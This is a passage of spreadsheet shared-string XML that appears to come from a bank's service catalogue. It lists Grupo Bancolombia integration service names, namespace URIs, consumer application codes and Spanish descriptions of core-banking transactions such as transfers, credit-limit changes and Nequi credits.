    <t>AW1097001;AW0157;AW0407;AW1285001;AW1286001</t>
  </si>
  <si>
    <t>EstudioCreditoConsumo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/EstudioCreditoConsumo/Enlace/V1.0</t>
  </si>
  <si>
    <t>GeneracionToken</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canal/Movil/GeneracionToken/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW0939;AW1150;AW1165;AW0937;AW1170;AW1011;AW0638;APIC;AW1097001;AW1312001;AW1128001;AW1203001</t>
  </si>
  <si>
    <t>GenerarOTP</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/GenerarOTP/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW1128;AW0937;APIC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SeguridadCorporativa/Canales/GenerarOTP/Enlace/V1.1</t>
  </si>
  <si>
    <t>GestionActaOperacionLeasing</t>
  </si>
  <si>
    <t>http://leasing.grupobancolombia.com/intf/Producto/LeasingFinanciero/GestionActaOperacionLeasing/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionAutenticacionFuerte</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Autenticacion/GestionAutenticacionFuerte/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW0856;AW0937;AW0638;APIC</t>
  </si>
  <si>
    <t>GestionClaveCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Canal/Comun/GestionClaveCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1170;PRECONSTRUCCIONCERT</t>
  </si>
  <si>
    <t>GestionClienteGiros</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/producto/CashManagement/GestionClienteGiros/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionClienteLeasing</t>
  </si>
  <si>
    <t>http://leasing.grupobancolombia.com/intf/Cliente/Conocimiento/GestionClienteLeasing/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionCodigosComercioAdquirencia</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Adquirencia/GestionCodigosComercioAdquirencia/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionComerciosAdquirencia</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Adquirencia/GestionComerciosAdquirencia/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionConciliacionClientes</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Relacionamiento/GestionConciliacionClientes/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionCuentaFlyPass</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Adquirencia/GestionCuentaFlyPass/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionCuentasAFC</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/GestionCuentasAFC/Enlace/V1.0</t>
  </si>
  <si>
    <t>AFC;BVD</t>
  </si>
  <si>
    <t>GestionCuentasAch</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/GestionCuentasAch/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionCuentasDeposito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/GestionCuentasDeposito/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;PRECONSTRUCCIONCERT</t>
  </si>
  <si>
    <t>GestionCuentasDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/GestionCuentasDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionDatosClienteSufi</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/transversalesTI/Informacion/GestionDatosClienteSufi/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionDeArchivos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/GestionDeArchivos/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionDebitoAutomatico</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/GestionDebitoAutomatico/Enlace/V1.0</t>
  </si>
  <si>
    <t>GDE;SVE;ALM;APP;SVP;SCI</t>
  </si>
  <si>
    <t>GestionDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/ComercioExterior/GestionDivisas/Enlace/V2.0</t>
  </si>
  <si>
    <t>GestionExternaDocumental</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/administracionDocumentos/GestionExternaDocumental/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW1177;AW1011;AW0638;AW1203001;Carvajal;DataFile</t>
  </si>
  <si>
    <t>GestionFacturas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/GestionFacturas/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionFondosFiduciarios</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Inversion/GestionFondosFiduciarios/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionFraudeCrediticio</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/GestionFraudeCrediticio/Enlace/V1.0</t>
  </si>
  <si>
    <t>HTR</t>
  </si>
  <si>
    <t>GestionGiroMulticanal</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/producto/CashManagement/GestionGiroMulticanal/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionInternaDocumental</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/administracionDocumentos/GestionInternaDocumental/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0659;AW1133;AW1177;AW0856;AW0638;AW1203001</t>
  </si>
  <si>
    <t>GestionLeasingFinanciero</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/LeasingFinanciero/GestionLeasingFinanciero/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionLimite</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/GestionLimite/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW0856;AW0937;AW1285001</t>
  </si>
  <si>
    <t>GestionListasDeControl</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRiesgo/GestionListasDeControl/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW11777;AW1128;AW1177;AW117;AW1128001</t>
  </si>
  <si>
    <t>GestionPrecalculadoCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Comun/GestionPrecalculadoCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW1177;AW0856;AW0937;ELIBOM;AW1299001;AW1313001;AW1316001;ALM;SVP;AW1285001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/Comun/GestionPrecalculadoCliente/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW1313001;AW1316001;AW1128;AW0937;AW1170;AW1299001;AW1177001;AW1285001</t>
  </si>
  <si>
    <t>GestionPuntosColombia</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRelacionamiento/GestionPuntosColombia/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionRealceTarjetas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/GestionRealceTarjetas/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionRecaudoDIAN</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/DIAN/GestionRecaudoDIAN/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionRelacionProductoCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/deposito/gestionrelacionproductocliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1011;AW1078</t>
  </si>
  <si>
    <t>GestionRemesas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/ComercioExterior/GestionRemesas/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionSimCard</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/Comun/GestionSimCard/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1086001;SSC</t>
  </si>
  <si>
    <t>GestionSolicitudCreditoConsumo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/GestionSolicitudCreditoConsumo/Enlace/V1.1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/GestionSolicitudCreditoConsumo/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1128;AW0937;AW1148001</t>
  </si>
  <si>
    <t>1.2</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/GestionSolicitudCreditoConsumo/Enlace/V1.2</t>
  </si>
  <si>
    <t>GestionTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/GestionTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionTransaccionesMediosDePago</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/MediosDePago/GestionTransaccionesMediosDePago/Enlace/V1.0</t>
  </si>
  <si>
    <t>APP;SVP</t>
  </si>
  <si>
    <t>GestionTransferenciasInternacionales</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/MonedaExtranjera/ComercioExterior/GestionTransferenciasInternacionales/Enlace/V1.0</t>
  </si>
  <si>
    <t>CDE</t>
  </si>
  <si>
    <t>GestionUsuarioCreditoConsumo</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Producto/CreditoConsumo/GestionUsuarioCreditoConsumo/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionUsuarioDATerceros</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Seguridad/Autenticacion/GestionUsuarioDATerceros/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionUsuarioValores</t>
  </si>
  <si>
    <t>http://valores.grupobancolombia.com/intf/seguridad/autenticacion/GestionUsuarioValores/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionUsuariosDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/ComercioExterior/GestionUsuariosDivisas/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionarCDT</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SegmentosdePersonas/AhorroeInversionPersonas/GestionarCDT/Enlace/V1.0</t>
  </si>
  <si>
    <t>SU2;CDT;SU5</t>
  </si>
  <si>
    <t>GestionarDocumentos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/GestionarDocumentos/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionarLlaves</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GestionarLlaves/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW0709001;AW0611001</t>
  </si>
  <si>
    <t>GestionarMetadata_BB5</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/GestionarMetadata_BB5/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0718001;Carvajal</t>
  </si>
  <si>
    <t>GestionarPagareElectronico</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/GestionarPagareElectronico/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1097001;AW0939;AW0856;AW1176;AW0937;AW1197;AW1285001</t>
  </si>
  <si>
    <t>GestionarProspecto</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GestionarProspecto/Enlace/V1.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GestionarProspecto/Enlace/V2.0</t>
  </si>
  <si>
    <t>SVP;AW1128;AW1177;AW0856;AW1011;AW1227001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GestionarProspecto/Enlace/V1.1</t>
  </si>
  <si>
    <t>AW11777;AW1128;AW0922;AW1177;AW117</t>
  </si>
  <si>
    <t>GestionarSolicitud</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GestionarSolicitud/Enlace/V1.0</t>
  </si>
  <si>
    <t>GestionarSolicitudesDeCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/EstrategiadeCanales/EstrategiadeInternet/GestionarSolicitudesDeCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0937</t>
  </si>
  <si>
    <t>GestionarTarjetaEnSistemaDeTransporte</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/MediosdePago/AceptaciondeMediosdePago/GestionarTarjetaEnSistemaDeTransporte/Enlace/V1.0</t>
  </si>
  <si>
    <t>GrabarDiscrepancia</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/FinanciacionyMonedaExtranjera/ProductosdeFinanciacionMLyME/GrabarDiscrepancia/Enlace/V1.0</t>
  </si>
  <si>
    <t>GrabarMovimientoEnCuenta</t>
  </si>
  <si>
    <t>http://banistmo.com/intf/ServicioBancaEmpresasGobiernoYDeMercadoCapitales/TesoreriaValoresTesoreriaBanco/GrabarMovimientoEnCuenta/Enlace/V1.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/GrabarParticipante/Enlace/V2.0</t>
  </si>
  <si>
    <t>AW0795;AW0611001;AW0611002</t>
  </si>
  <si>
    <t>InscripcionDeFacturas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/InscripcionDeFacturas/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0360;GDE;PSE;SVE;CNB;ALM;APP;SVP;SRC;FAC;AUD</t>
  </si>
  <si>
    <t>LineaUnica</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Cliente/GestionRelacionamiento/LineaUnica/Enlace/V1.0</t>
  </si>
  <si>
    <t>ModificacionDeCupoTarjetas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/MediosPago/TarjetasCredito/ModificacionDeCupoTarjetas/Enlace/V1.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/ModificarParticipante/Enlace/V2.0</t>
  </si>
  <si>
    <t>NotificaEnvioArchivo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/NotificaEnvioArchivo/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01065;PSE;TVP;PAB</t>
  </si>
  <si>
    <t>NotificaEnvioArchivoIseries</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/NotificaEnvioArchivoIseries/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01065;SVE;TVP</t>
  </si>
  <si>
    <t>NotificacionCreditoConsumo</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Comun/NotificacionCreditoConsumo/Enlace/V1.0</t>
  </si>
  <si>
    <t>NotificacionFinProcesamientoArchivosDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/NotificacionFinProcesamientoArchivosDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01065;SUF;BVD</t>
  </si>
  <si>
    <t>NotificacionNovedadMesaAyuda</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Externo/Comun/NotificacionNovedadMesaAyuda/Enlace/V1.0</t>
  </si>
  <si>
    <t>TP;AW1142001</t>
  </si>
  <si>
    <t>NotificacionRespuestaDocumental</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Corporativo/AdministracionDocumentos/NotificacionRespuestaDocumental/Enlace/V1.0</t>
  </si>
  <si>
    <t>NotificacionTransaccionesNequi</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Auditabilidad/NotificacionTransaccionesNequi/Enlace/V1.0</t>
  </si>
  <si>
    <t>NotificacionValidacionBiometrica</t>
  </si>
  <si>
    <t>http://sufi.grupobancolombia.com/intf/Seguridad/Autenticacion/NotificacionValidacionBiometrica/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1081001;AW1142001</t>
  </si>
  <si>
    <t>NotificarEstadoSolicitudDeCredito_BB12</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/NotificarEstadoSolicitudDeCredito_BB12/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW0499;Carvajal</t>
  </si>
  <si>
    <t>PagarCreditoHipotecario</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/InmobiliariayConstructor/EstructuracionyDesarrollodeProductosHipotecarios/PagarCreditoHipotecario/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01010;GDE;SVP;SCI;AUD</t>
  </si>
  <si>
    <t>PaginacionFondosFiduciarios</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Inversion/PaginacionFondosFiduciarios/Enlace/V1.0</t>
  </si>
  <si>
    <t>PagoConTransferencia</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/PagoConTransferencia/Enlace/V1.0</t>
  </si>
  <si>
    <t>BDT</t>
  </si>
  <si>
    <t>PagoDeFacturas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/PagoDeFacturas/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0360;ATM;GDE;PSE;SVE;PAC;ALL;CNB;ALM;FAC;SAI;APP;SVP;AUD;SCI</t>
  </si>
  <si>
    <t>PagoFactura</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CashManagement/PagoFactura/Enlace/V1.0</t>
  </si>
  <si>
    <t>PagoPrestamos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CreditoConsumo/PagoPrestamos/Enlace/V1.0</t>
  </si>
  <si>
    <t>PagoTarjetaCredito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Tarjetas/PagoTarjetaCredito/Enlace/V1.0</t>
  </si>
  <si>
    <t>PredictorIngresos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosparaEmpresasyGobierno/ServiciosdeRecaudosyPagos/PredictorIngresos/Enlace/V2.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosparaEmpresasyGobierno/ServiciosdeRecaudosyPagos/PredictorIngresos/Enlace/V1.0</t>
  </si>
  <si>
    <t>ProcesamientoArchivosDepositos</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Depositos/ProcesamientoArchivosDepositos/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW1110001;AW01065;SUF;AFC;AW1078</t>
  </si>
  <si>
    <t>RealizarOperacionCheque</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/InmobiliariayConstructor/EstructuracionyDesarrollodeProductosHipotecarios/RealizarOperacionCheque/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01010;SCI;AW0709001</t>
  </si>
  <si>
    <t>RecuperarCatalogo_BB2</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/RecuperarCatalogo_BB2/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0922;AW0856;AW0998;AW0856</t>
  </si>
  <si>
    <t>RecuperarComisionesCliente</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/FinanciacionyMonedaExtranjera/ProductosdeFinanciacionMLyME/RecuperarComisionesCliente/Enlace/V1.0</t>
  </si>
  <si>
    <t>4.0</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/RecuperarDatosCliente/Enlace/V4.0</t>
  </si>
  <si>
    <t>CDT;AW0856;AW1285001;AW1302001;AW0210001;AW1128;AW1287;AW1177;AW1284;AW0937;AW1011;AW1249;AW0638;AW1078;AW1258002;AW0939001;ELIBOM;AW1272001;AW0360009;APIC;AW1097001;AW1312001;SU2;GDE;SVE;TVP;APP;SVP;AW1204001;AW1108001</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/RecuperarDatosCliente/Enlace/V3.0</t>
  </si>
  <si>
    <t>AW1128;AW0939;AW0360;AW1177;AW1165;AW0937;AW1170;AW0901;SVE;MAT;AW0611001;SYC;CDE;AW0937;BSN;AW0922;AW1176;AW1108001</t>
  </si>
  <si>
    <t>3.1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Clientes/GestionClientes/RecuperarDatosCliente/Enlace/V3.1</t>
  </si>
  <si>
    <t>AW0709001;AW1128;AW0937;AW0611001</t>
  </si>
  <si>
    <t>RecuperarDocumentos_BB1</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/ServiciosAdministrativos/ServiciosdeInformacionDocumental/RecuperarDocumentos_BB1/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW0856;AW11777;AW1182;AW0922;AW1177;AW0856;AW0611001;AW117</t>
  </si>
  <si>
    <t>RegistroUsuarioValidacionBiometrica</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Autenticacion/RegistroUsuarioValidacionBiometrica/Enlace/V1.0</t>
  </si>
  <si>
    <t>SeguridadInformacionTarjetas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Confidencialidad/SeguridadInformacionTarjetas/Enlace/V1.0</t>
  </si>
  <si>
    <t>SolicitudDeAutorizacion</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Autorizacion/SolicitudDeAutorizacion/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01065;SUF;AW1078;AW1110001</t>
  </si>
  <si>
    <t>TransaccionesMediosDePago</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/MediosPago/TransaccionesMediosDePago/Enlace/V1.0</t>
  </si>
  <si>
    <t>TransferenciaCuentasDeposito</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/Deposito/TransferenciaCuentasDeposito/Enlace/V1.0</t>
  </si>
  <si>
    <t>PRECONSTRUCCIONPDN;AW1170</t>
  </si>
  <si>
    <t>TransferenciaFondosBancoABancaDigital</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Producto/CuentaAhorroCorriente/TransferenciaFondosBancoABancaDigital/Enlace/V1.0</t>
  </si>
  <si>
    <t>ValidacionCuentasNequi</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Externos/Comun/ValidacionCuentasNequi/Enlace/V1.0</t>
  </si>
  <si>
    <t>ALM;BVD</t>
  </si>
  <si>
    <t>ValidarCuenta</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/SegmentosdePersonas/AhorroeInversionPersonas/ValidarCuenta/Enlace/V1.0</t>
  </si>
  <si>
    <t>AW01010;AW0709001</t>
  </si>
  <si>
    <t>VenderDivisas</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Posicionpropia/DivisasyAdministracionRiesgoCambiario/VenderDivisas/Enlace/V1.0</t>
  </si>
  <si>
    <t>VerificacionCodigoAutorizacion</t>
  </si>
  <si>
    <t>http://grupobancolombia.com/intf/Seguridad/Autorizacion/VerificacionCodigoAutorizacion/Enlace/V1.0</t>
  </si>
  <si>
    <t>BIM;AW1189001</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>domain</t>
  </si>
  <si>
    <t>0001-BTM:TRANSFERENCIADESDEBOTÓNBANCOLOMBIA</t>
  </si>
  <si>
    <t>Transacción cuya función es realizar una transferencia solicitada desde Botón Bancolombia, con el respectivo cobro de comisión e IVA al comercio en caso de aplicar, consumiendo los servicios de DEPÓSITOS; transferencia(0007) y débito(0005). Esta transacción valida y actualiza los topes generales que tiene banco.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Task</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.5_Productos-Tarjetas</t>
  </si>
  <si>
    <t>0001-BV5:GENERACIÓNARCHIVOPRESTAMOSPORCONVENIOSIFS</t>
  </si>
  <si>
    <t>Esta transacción se encarga de consultar préstamos asociados a convenios existentes para luego generar un archivo plano en una ruta IFS que luego toma el canal y llevarle la información al cliente.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Utility</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2.4_Productos-CreditoDeConsumo</t>
  </si>
  <si>
    <t>0001-BVL:GENERARDESEMBOLSOMQI</t>
  </si>
  <si>
    <t xml:space="preserve">Actualmente, los core de productos se encuentran operando en máquinas ISeries – AS/400, bajo el sistema operativo OS/400; es muy común encontrar dentro del esquema actual programas de diferentes aplicativos que consultan directamente información de tablas de otros aplicativos, generando alto acoplamiento entre los programas de las diferentes aplicaciones y por ende problemas de mantenibilidad que se traducen en altos costos en las iniciativas.
Para el caso de cartera, existen un gran número programas de otras aplicaciones diferentes que requieren generar prestamos desde las diferentes experiencias digitales tanto de la modalidad de consumo como de la de libranzas por lo cual se desarrolló un servicio el cual se encarga de generar estos a través de la herramienta de sti.
</t>
  </si>
  <si>
    <t>0001-C03:Tx_Acum_Rev_CEN_PCO</t>
  </si>
  <si>
    <t>Recibe transacciones para acumulación o cancelación de puntos, las cuales provienen de Medios de pago, estas transaccíones a su vez seran enviadas al aplicativo PCO (Puntos colombia) para la gestion respectiva de puntos, luego de esto se recibe respuesta de PCO y se alacenara en un archivo LOG toda esta información.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.1.1_Clientes-Conocimiento</t>
  </si>
  <si>
    <t xml:space="preserve">Esta transaccion recibe los registros enviados por medios de pago, los alamcena y posteriormente los envia al aplicativo puntos colombia para garantizar la acumulacion de puntos del cliente por compras con tarjeta debito.
</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.1_Clientes</t>
  </si>
  <si>
    <t>0001-DTF:SERVIDORCONSULTADATOSFINANCIEROSDELCLIENTE</t>
  </si>
  <si>
    <t>TX a través de la cual se realiza el consumo del servicio "ConsultarDatosCliente2.0" en MDM ( a través del integrador ), particularmente la operación de consulta de datos financieros.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Application</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5_Canales</t>
  </si>
  <si>
    <t>0001-ECP:CREDITONEQUI-BANCOLOMBIA</t>
  </si>
  <si>
    <t xml:space="preserve">Transacción encargada de realizar acreditación a cuenta Bancolombia por transferencias con QR desde Nequi haciendo uso de los servicios expuestos por depósitos. 
Genera envío de alertas y notificaciones al propietario de la cuenta a la que se realizó la acreditación y a si mismo a un delegado de la transacción. 
Guarda la información de la transacción en la nube  
</t>
  </si>
  <si>
    <t>0001-GR1:TransacciónValidarDatosGirador</t>
  </si>
  <si>
    <t>Transacción validar datos girador antes de crear el giro</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Business</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.2_Productos</t>
  </si>
  <si>
    <t>0001-GR1:ValidarDatosGirador</t>
  </si>
  <si>
    <t>Validar datos del girador antes de crear el Giro.</t>
  </si>
  <si>
    <t>0001-MT5:TransaccionAdministrativa800ISOLogON</t>
  </si>
  <si>
    <t>Servicio que permite armar la respuesta de conexion a Aunthentic</t>
  </si>
  <si>
    <t>0001-NEQ:TRANSFERENCIAACUENTANEQUI</t>
  </si>
  <si>
    <t>Transferencias de Bancolombia a cuentas Nequi</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.7_Canales-OperacionComunesCanales</t>
  </si>
  <si>
    <t>0001-RVC:EnrolamientoMediodePagoDébito</t>
  </si>
  <si>
    <t>Enrolamiento medio de pago débito para recaudo electrónico vehicular (alianza flypass)</t>
  </si>
  <si>
    <t>0001-SRC:RegistrarFactura</t>
  </si>
  <si>
    <t>Permite inscribir facturas que tengan convenio en DELAY</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/service_type#Entity</t>
  </si>
  <si>
    <t>0001-SW2:RespuestaGPIAlTracker</t>
  </si>
  <si>
    <t>Recibe mensaje de CIB para dar respuesta a una solicitud de transacción bancaria. Driver hace entrega del mensaje al Broker para que Broker haga el envío al Tracker de Swift.</t>
  </si>
  <si>
    <t>urn://grupobancolombia.com/classification/modelo_referencia_aplicativa#1.5.6_Canales-AtencionADistancia</t>
  </si>
  <si>
    <t>0001-TC1:TransacciónMonetariaAvanceTarjetaDeCréditoaCuentaspropiasydeTerceros</t>
  </si>
  <si>
    <t>0001-TC2:ModificacionCupoTDC</t>
  </si>
  <si>
    <t>La transacción 0001 (Flujo: FLSOL_TC2_0001) permite realizar el Aumento o Disminucion de cupo de una tarjeta de crédito de forma Definitiva, que consisten en verificar el cupo actual de la tarjeta contra el sistema de FirstData y ejecutar el nuevo limite de cupo que se desea aplicar, valida las validaciones necesarias que están parametrizados (Archivo TDCFFPASIS) si cumple para ejecutar el servicio , entonces el sistema procede a realizar la transacción, de lo contrario el sistema sigue con el flujo de error.</t>
  </si>
  <si>
